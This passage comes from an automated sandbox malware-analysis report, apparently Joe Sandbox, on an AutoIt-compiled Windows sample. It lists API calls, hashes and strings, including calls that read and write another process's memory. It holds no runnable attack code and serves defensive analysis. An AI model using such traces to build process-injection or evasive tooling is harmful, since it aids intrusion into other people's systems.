                                                          • KillTimer.USER32(?,0000040A), ref: 00CBC242
                                                          • EndDialog.USER32(?,00000001), ref: 00CBC25C
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                          • Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd
                                                          Similarity
                                                          • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                          • String ID:
                                                          • API String ID: 3741023627-0
                                                          • Opcode ID: 1567f340e6219e277d3f1f2141415232d79325663429cfda5da43442a2f48694
                                                          • Instruction ID: fc1ebef1da4885f4d6acd38b12007c8905c63d7de3f97f8d30b471a999308f7d
                                                          • Opcode Fuzzy Hash: 1567f340e6219e277d3f1f2141415232d79325663429cfda5da43442a2f48694
                                                          • Instruction Fuzzy Hash: 3701AD30404704ABEB205B60EDCEB9A77BCBB00B06F00066DB692A54E1DBF4AA459B91
                                                          APIs
                                                          • EndPath.GDI32(?), ref: 00C613BF
                                                          • StrokeAndFillPath.GDI32(?,?,00C9B888,00000000,?), ref: 00C613DB
                                                          • SelectObject.GDI32(?,00000000), ref: 00C613EE
                                                          • DeleteObject.GDI32 ref: 00C61401
                                                          • StrokePath.GDI32(?), ref: 00C6141C
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                          • Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd
                                                          Similarity
                                                          • API ID: Path$ObjectStroke$DeleteFillSelect
                                                          • String ID:
                                                          • API String ID: 2625713937-0
                                                          • Opcode ID: 9e50e057171f874d75a48d23e9763dbef27aab66d69559399d7b50dcdb24d4a0
                                                          • Instruction ID: 6d9ab0f9aa620ed265366092706354479bef2c4d570ea38afb9202c481686114
                                                          • Opcode Fuzzy Hash: 9e50e057171f874d75a48d23e9763dbef27aab66d69559399d7b50dcdb24d4a0
                                                          • Instruction Fuzzy Hash: FDF0CD30004748DBDB315F16EC8DB687BA4A711336F4C8229E969892F5C7714697DF60
                                                          APIs
                                                            • Part of subcall function 00C80DB6: std::exception::exception.LIBCMT ref: 00C80DEC
                                                            • Part of subcall function 00C80DB6: __CxxThrowException@8.LIBCMT ref: 00C80E01
                                                            • Part of subcall function 00C67DE1: _memmove.LIBCMT ref: 00C67E22
                                                            • Part of subcall function 00C67A51: _memmove.LIBCMT ref: 00C67AAB
                                                          • __swprintf.LIBCMT ref: 00C72ECD
                                                          Strings
                                                          • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 00C72D66
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                          • Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd
                                                          Similarity
                                                          • API ID: _memmove$Exception@8Throw__swprintfstd::exception::exception
                                                          • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                                                          • API String ID: 1943609520-557222456
                                                          • Opcode ID: 0e113577817186a437c98caa3a036d22629a3312b2397a05b533cdfdc51b17bc
                                                          • Instruction ID: 576265a112668374d5b3fb028f031cd88ffec44a23119668580c9da7fe807c90
                                                          • Opcode Fuzzy Hash: 0e113577817186a437c98caa3a036d22629a3312b2397a05b533cdfdc51b17bc
                                                          • Instruction Fuzzy Hash: D4917D711082019FC724FF64D885C6FB7A8EF95714F14491DF8969B2A1EB30EE44EB62
                                                          APIs
                                                            • Part of subcall function 00C64750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00C64743,?,?,00C637AE,?), ref: 00C64770
                                                          • CoInitialize.OLE32(00000000), ref: 00CCB9BB
                                                          • CoCreateInstance.OLE32(00CF2D6C,00000000,00000001,00CF2BDC,?), ref: 00CCB9D4
                                                          • CoUninitialize.OLE32 ref: 00CCB9F1
                                                            • Part of subcall function 00C69837: __itow.LIBCMT ref: 00C69862
                                                            • Part of subcall function 00C69837: __swprintf.LIBCMT ref: 00C698AC
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                          • Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd
                                                          Similarity
                                                          • API ID: CreateFullInitializeInstanceNamePathUninitialize__itow__swprintf
                                                          • String ID: .lnk
                                                          • API String ID: 2126378814-24824748
                                                          • Opcode ID: 9e691ae255a17f02b09bc0dbe2b717211584c71c68edefe18bac9522b6a61bab
                                                          • Instruction ID: e2c553790a8b1fa42f4c3e36132ad67a415d8428a2088953bf974b90e3941982
                                                          • Opcode Fuzzy Hash: 9e691ae255a17f02b09bc0dbe2b717211584c71c68edefe18bac9522b6a61bab
                                                          • Instruction Fuzzy Hash: 4EA153746042019FCB10DF54C895E6ABBE9FF89314F14899CF8A99B3A1CB31ED46CB91
                                                          APIs
                                                          • __startOneArgErrorHandling.LIBCMT ref: 00C850AD
                                                            • Part of subcall function 00C900F0: __87except.LIBCMT ref: 00C9012B
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                          • Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd
                                                          Similarity
                                                          • API ID: ErrorHandling__87except__start
                                                          • String ID: pow
                                                          • API String ID: 2905807303-2276729525
                                                          • Opcode ID: 0aa854d86660574bcabbc838ea763e321df35773331edf28eb1941e6c0e60041
                                                          • Instruction ID: 048297499a4b72934ed25185196213f9b6c8c17c8788385445c4c84f9bce74ef
                                                          • Opcode Fuzzy Hash: 0aa854d86660574bcabbc838ea763e321df35773331edf28eb1941e6c0e60041
                                                          • Instruction Fuzzy Hash: 88516E71A0CA029ADF117724C90937E2BD4AB41704F308D59E4F5862E9DF748FD4EB8A
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                          • Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd
                                                          Similarity
                                                          • API ID: _memset$_memmove
                                                          • String ID: ERCP
                                                          • API String ID: 2532777613-1384759551
                                                          • Opcode ID: 85de407b68972c67ba5f3250883cc863584da5284bbffca5f80a88cd162e19a3
                                                          • Instruction ID: 6614114044dcf8fcb35e66d255f6bdf08da8d77e80b7256e1e80909e6f4d5df4
                                                          • Opcode Fuzzy Hash: 85de407b68972c67ba5f3250883cc863584da5284bbffca5f80a88cd162e19a3
                                                          • Instruction Fuzzy Hash: 8951AE70900B05DBDB24DFA5C885BEBBBE4EF04314F20856EE95ADB291E770AA44CB50
                                                          APIs
                                                            • Part of subcall function 00CC14BC: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00CB9296,?,?,00000034,00000800,?,00000034), ref: 00CC14E6
                                                          • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 00CB983F
                                                            • Part of subcall function 00CC1487: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00CB92C5,?,?,00000800,?,00001073,00000000,?,?), ref: 00CC14B1
                                                            • Part of subcall function 00CC13DE: GetWindowThreadProcessId.USER32(?,?), ref: 00CC1409
                                                            • Part of subcall function 00CC13DE: OpenProcess.KERNEL32(00000438,00000000,?,?,?,00CB925A,00000034,?,?,00001004,00000000,00000000), ref: 00CC1419
                                                            • Part of subcall function 00CC13DE: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,00CB925A,00000034,?,?,00001004,00000000,00000000), ref: 00CC142F
                                                          • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00CB98AC
                                                          • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00CB98F9
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                          • Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd
                                                          Similarity
                                                          • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                                          • String ID: @
                                                          • API String ID: 4150878124-2766056989
                                                          • Opcode ID: 4f2d1e51cd73cf3a39159d724f0458c650d0d8ad36e5fe1d3cf3b5bb865094e4
                                                          • Instruction ID: 4eb0a4731e7013a290ed79d3407b2cb27dffb1e6d849fc1fe54f0f176f4147a0
                                                          • Opcode Fuzzy Hash: 4f2d1e51cd73cf3a39159d724f0458c650d0d8ad36e5fe1d3cf3b5bb865094e4
                                                          • Instruction Fuzzy Hash: 26413976900218AFDB10DFA4CC85FDEBBB8EB0A300F044099FA55A7191DA716F45DBA0
                                                          APIs
                                                          • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,00CEF910,00000000,?,?,?,?), ref: 00CE79DF
                                                          • GetWindowLongW.USER32 ref: 00CE79FC
                                                          • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00CE7A0C
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                          • Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd
                                                          Similarity
                                                          • API ID: Window$Long
                                                          • String ID: SysTreeView32
                                                          • API String ID: 847901565-1698111956
                                                          • Opcode ID: c4984bc157b943260756d534a46bc03c7151049b1f01ff287d6ec87f36a48c22
                                                          • Instruction ID: a2a11e055cef7159e46aea6587440ced4507de9698d6262dd6798f8c2f429d73
                                                          • Opcode Fuzzy Hash: c4984bc157b943260756d534a46bc03c7151049b1f01ff287d6ec87f36a48c22
                                                          • Instruction Fuzzy Hash: E431EF32204646AFDB218F39DC41BEA77A9EF05324F244725F875A32E1D731EE519B60
                                                          APIs
                                                          • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 00CE7461
                                                          • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 00CE7475
                                                          • SendMessageW.USER32(?,00001002,00000000,?), ref: 00CE7499
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                          • Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$Window
                                                          • String ID: SysMonthCal32
                                                          • API String ID: 2326795674-1439706946
                                                          • Opcode ID: bfa33d0ebbd0693ce691a179a59f6fcb86b151309f177bd581efb7b918cb573d
                                                          • Instruction ID: 71907cf13d8db9acf5d4ad1bb0d523d76661177700fa7017599cf99001cdb2c7
                                                          • Opcode Fuzzy Hash: bfa33d0ebbd0693ce691a179a59f6fcb86b151309f177bd581efb7b918cb573d
                                                          • Instruction Fuzzy Hash: 34219F32500258ABDF218FA5DC86FEA3B79EB48724F110214FE156B1D0DA75AD919BA0
                                                          APIs
                                                          • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 00CE7C4A
                                                          • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 00CE7C58
                                                          • DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00CE7C5F
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                          • Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$DestroyWindow
                                                          • String ID: msctls_updown32
                                                          • API String ID: 4014797782-2298589950
                                                          • Opcode ID: f8474d36a96bf27ebe299f65f1f55d329d64a61224f47f758f06fed64306d322
                                                          • Instruction ID: b5e5fe6dc4cfb681283ea6cbf421daebb287c6379ba63ce3d12c5a669f1a2a19
                                                          • Opcode Fuzzy Hash: f8474d36a96bf27ebe299f65f1f55d329d64a61224f47f758f06fed64306d322
                                                          • Instruction Fuzzy Hash: E1217AB1204289AFDB10DF29DCC1DBB77ACEB5A354B140559FA119B3A1CB71ED019AB0
                                                          APIs
                                                          • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00CE6D3B
                                                          • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00CE6D4B
                                                          • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00CE6D70
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                          • Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$MoveWindow
                                                          • String ID: Listbox
                                                          • API String ID: 3315199576-2633736733
                                                          • Opcode ID: 3372b3a685cbc2b0d4297fd55b4f74e8d1f8abb1430ee237675fddb9419a0f45
                                                          • Instruction ID: 3f0ef3fee0e8d417872c828bea7f4fde67df0fe1b1df8d90fea0cf5ec4d6ab55
                                                          • Opcode Fuzzy Hash: 3372b3a685cbc2b0d4297fd55b4f74e8d1f8abb1430ee237675fddb9419a0f45
                                                          • Instruction Fuzzy Hash: E3210432210158BFDF218F55CC81FBF3BBAEF997A0F108128F9509B1A0CA719D5187A0
                                                          APIs
                                                          • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00CE7772
                                                          • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 00CE7787
                                                          • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00CE7794
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                          • Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd
                                                          Similarity
                                                          • API ID: MessageSend
                                                          • String ID: msctls_trackbar32
                                                          • API String ID: 3850602802-1010561917
                                                          • Opcode ID: a34ae7301c5792764c24bf82b456abb1f1952ad6f4271aad61a430189e45e28f
                                                          • Instruction ID: d810cb24b300066b066d68c5b776ec018fa622b5d15935c297f95375552eceec
                                                          • Opcode Fuzzy Hash: a34ae7301c5792764c24bf82b456abb1f1952ad6f4271aad61a430189e45e28f
                                                          • Instruction Fuzzy Hash: DF113A72244248BFEF215F62CC41FEB776CEF88B54F010218FA5196090C671E851DB20
                                                          APIs
                                                          • LoadLibraryA.KERNEL32(kernel32.dll,?,00C64BD0,?,00C64DEF,?,00D252F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00C64C11
                                                          • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00C64C23
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                          • Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd
                                                          Similarity
                                                          • API ID: AddressLibraryLoadProc
                                                          • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                                          • API String ID: 2574300362-3689287502
                                                          • Opcode ID: fb9a6ed4a2eb72df4a6b5afef936021daf4723f9f899f3df964b94b9a799b37a
                                                          • Instruction ID: a433fbf9b44c83c55b646197dc504f9c49bd63a20729cd7ffb87dd8da12a0aac
                                                          • Opcode Fuzzy Hash: fb9a6ed4a2eb72df4a6b5afef936021daf4723f9f899f3df964b94b9a799b37a
                                                          • Instruction Fuzzy Hash: D5D01231511713DFD7205F71D98874FB6D6EF09351B11CC3D9495DA250E6B4D481C650
                                                          APIs
                                                          • LoadLibraryA.KERNEL32(kernel32.dll,?,00C64B83,?), ref: 00C64C44
                                                          • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00C64C56
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                          • Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd
                                                          Similarity
                                                          • API ID: AddressLibraryLoadProc
                                                          • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                                          • API String ID: 2574300362-1355242751
                                                          • Opcode ID: 217967c58d5cac37766d3917d2496f35790206e84c5d2e539e1bad52827d2a62
                                                          • Instruction ID: 63b8affef5e5b2d0472537bef0965799ca8885d5f4ed5069949d0ee564e0334e
                                                          • Opcode Fuzzy Hash: 217967c58d5cac37766d3917d2496f35790206e84c5d2e539e1bad52827d2a62
                                                          • Instruction Fuzzy Hash: F5D01731510B13EFD7289F32E98874E7AE6AF05351B11C83ED4A6DA264EA74D880CA60
                                                          APIs
                                                          • LoadLibraryA.KERNEL32(advapi32.dll,?,00CE1039), ref: 00CE0DF5
                                                          • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00CE0E07
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                          • Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd
                                                          Similarity
                                                          • API ID: AddressLibraryLoadProc
                                                          • String ID: RegDeleteKeyExW$advapi32.dll
                                                          • API String ID: 2574300362-4033151799
                                                          • Opcode ID: ba2790270d9add5cfa9e4dfdca2df8b055f146a02c86fb266fe03fd6ac30a3c3
                                                          • Instruction ID: 105a8d28e18df968c24f3bfb86a6713abd061b00d7823174fc6e1760508c7631
                                                          • Opcode Fuzzy Hash: ba2790270d9add5cfa9e4dfdca2df8b055f146a02c86fb266fe03fd6ac30a3c3
                                                          • Instruction Fuzzy Hash: 15D0C271400716DFD3204FB1D85838AB2D6AF00341F108C3D94D2D6150DAB0D4D0C650
                                                          APIs
                                                          • LoadLibraryA.KERNEL32(kernel32.dll,00000001,00CD8CF4,?,00CEF910), ref: 00CD90EE
                                                          • GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 00CD9100
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                          • Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd
                                                          Similarity
                                                          • API ID: AddressLibraryLoadProc
                                                          • String ID: GetModuleHandleExW$kernel32.dll
                                                          • API String ID: 2574300362-199464113
                                                          • Opcode ID: bd41b7b2a4d2c4f3715f507a292f074f213e3f7c3c5ba9dd0d0cea511d7ca0af
                                                          • Instruction ID: 1453c7f9bcab42786486eb9421ab6307a4f03c597f25674ce9d9306955d22854
                                                          • Opcode Fuzzy Hash: bd41b7b2a4d2c4f3715f507a292f074f213e3f7c3c5ba9dd0d0cea511d7ca0af
                                                          • Instruction Fuzzy Hash: 5FD01739510713DFDB209F31D85874E76E4AF05351B12C83EA59ADA690EA70C881DAA0
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                          • Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
